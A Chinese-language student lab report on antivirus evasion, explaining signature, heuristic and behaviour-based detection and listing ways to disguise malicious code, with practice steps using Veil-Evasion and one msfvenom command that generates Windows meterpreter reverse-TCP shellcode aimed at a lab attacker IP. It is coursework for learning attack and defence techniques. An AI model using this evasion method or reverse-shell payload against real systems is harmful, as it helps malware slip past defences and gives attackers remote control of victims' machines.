免殺原理與實踐

 

MarkdownPad Document

免殺原理與實踐

1.基礎問題

（1）殺軟是如何檢測出惡意代碼的？

1：基於特徵碼

一段特徵碼就是一段或多段數據。（若是一個可執行文件（或其餘運行的庫、腳本等）包含這樣的數據則被認爲是惡意代碼）
殺毒軟件有本身專門的特徵碼庫，在檢測一個程序是不是惡意代碼時就看這個程序中的是否包含有特徵碼庫中的特徵碼，若是有就進行查殺。可是特徵碼庫並非老是能第一時間更新，若是出現了特徵碼庫中沒有的新特徵碼，那麼就沒法經過這種比對的方法進行查殺。

2： 啓發式惡意軟件檢測

When I see a bird that walks like a duck and swims like a duck and quacks like a duck, I call that bird a duck.
若是一個軟件作的事和惡意代碼同樣，那麼認爲這樣的程序是惡意代碼，用本身的話歸納就是：寧肯殺錯，不可放過（= =。）

3：基於行爲的惡意軟件檢測

（2）免殺是作什麼？ 就是經過針對殺毒軟件查殺惡意代碼的原理，將惡意代碼進行修改和包裝，反過來使得惡意代碼可以不被殺毒軟件所檢測和查殺，更好地植入到被攻擊的主機中進行一些非法的操做。 （3）免殺的基本方法有哪些？ 1：改變特徵碼,爲惡意代碼加上一層保護殼，好比利用從新進行編碼的方式改變其源代碼，或者改變它的編譯方式，從而使殺毒軟件檢測不到惡意代碼的特徵碼已達到免殺的目的

2：改變惡意代碼的行爲，在使用反彈式連接能夠避免防火牆或者殺毒軟件檢測到惡意代碼，即想辦法繞過這些有防火牆或者殺毒軟件保護的路徑。在惡意代碼對系統進行操做的時候，儘可能使本身看起來像一個正常的程序同樣，避免一些有可能被殺毒軟件檢測到並斷定爲惡意代碼的可疑行爲。

3：很是規方法，例如純手工編寫一個惡意代碼，殺毒軟件的惡意代碼庫中通常是大規模流行於市面的惡意代碼，對我的編寫的惡意代碼沒有用處。

2.實踐總結

攻擊機IP：192.168.58.129

2.用Veil-Evasion生成可執行文件

kali本來沒有veil-evasion ，因此須要先安裝sudo apt-get install veil-evasion
而後使用命令Veil-Evation,打開Veil-Evation,按照menu提示進行相關操做：

 

 

 

3.shellcode編程

在kali終端下生成一個c格式的十六進制數組，ip爲kali的
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.58.129 LPORT=443 -f c